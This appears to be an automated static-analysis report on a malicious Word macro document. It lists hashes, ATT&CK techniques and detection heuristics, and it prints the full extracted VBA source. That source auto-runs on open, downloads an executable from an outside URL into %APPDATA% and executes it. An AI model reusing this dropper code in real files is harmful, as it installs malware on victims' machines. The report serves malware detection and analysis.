Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1829fa497c0e09c1…

MALICIOUS

Office (OOXML)

Size: 16.2 KB
Created: 2014-05-19 22:09:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2014-07-31
MD5: eb83dd9498cb37b87d8128a9be073d15
SHA-1: fce65d954aa0754cd6e77b7cbc529f1214c38c21
SHA-256: 1829fa497c0e09c1fa1be7dbb90a9606386247027dbc7d0943db342839079f5c
Risk Score: 418

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample is an Office document containing VBA macros that are automatically executed upon opening. The script utilizes WScript.Shell and CreateObject to download a file from 'http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe' and saves it as '%APPDATA%\service\service.exe'. It then executes this downloaded file, indicating a dropper functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
       Else: Set Var_005 = CreateObject("Scripting.FileSystemObject"): Var_005.CreateFolder Var_003: End If: Dim Var_006: Set Var_006 = CreateObject("Adodb.Stream"): Dim Var_007: Set Var_007 = CreateObject("Microsoft.XMLHTTP"): Var_007.Open "GET", "http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe", False: Var_007.Send: With Var_006: .Type = 1: .Open: .write Var_007.responseBody: .savetofile Var_002 & "\service\service.exe", 2: End With: Call Func_001(Var_003): End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen(): Sub_001: End Sub
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open(): Sub_001: End Sub
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL (Referenced by)
    • http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (Referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (Referenced by macro)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1765 bytes
SHA-256: cf08c207ea36b6024b929824c4e33f04194fed701a73f5bd3f0c164dbc77290a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
End Function

Sub AutoOpen(): Sub_001: End Sub

Sub Document_Open(): Sub_001: End Sub

Sub Sub_001(): Set Var_001 = CreateObject("WScript.Shell"): Var_002 = Var_001.ExpandEnvironmentStrings("%APPDATA%"): Dim Var_003: Var_003 = Var_002 & "\service": Set Var_004 = CreateObject("Scripting.FileSystemObject")

   If (Var_004.FolderExists(Var_003)) Then

   Else: Set Var_005 = CreateObject("Scripting.FileSystemObject"): Var_005.CreateFolder Var_003: End If: Dim Var_006: Set Var_006 = CreateObject("Adodb.Stream"): Dim Var_007: Set Var_007 = CreateObject("Microsoft.XMLHTTP"): Var_007.Open "GET", "http://www.filehole.net/files/9784278da0d31dcb64d5e3d47fe1b153.exe", False: Var_007.Send: With Var_006: .Type = 1: .Open: .write Var_007.responseBody: .savetofile Var_002 & "\service\service.exe", 2: End With: Call Func_001(Var_003): End Sub

Function Func_001(bVal_001): Dim Var_004, Var_008, Var_009, Var_010, Var_011, Var_012: Dim Var_013: Set Var_013 = CreateObject("WScript.Shell"): Var_011 = "": Set Var_004 = CreateObject("Scripting.FileSystemObject")

    If (Var_004.FolderExists(bVal_001)) Then

      Set Var_008 = Var_004.GetFolder(bVal_001): Set Var_009 = Var_008.Files: For Each Var_010 In Var_009: Dim Var_014: Var_014 = bVal_001 & "\" & Var_010.Name: Var_013.Run Chr(34) & Var_014 & Chr(34), 1, True: Next: Set Var_010 = Nothing: Set Var_009 = Nothing: Set Var_008 = Nothing: End If: Set Var_004 = Nothing: End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 10240 bytes
SHA-256: 78975426c36a0bc2a629c5c7f6831c0d94bf9c1042e9f367d82bc9f5c6a8fe01
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely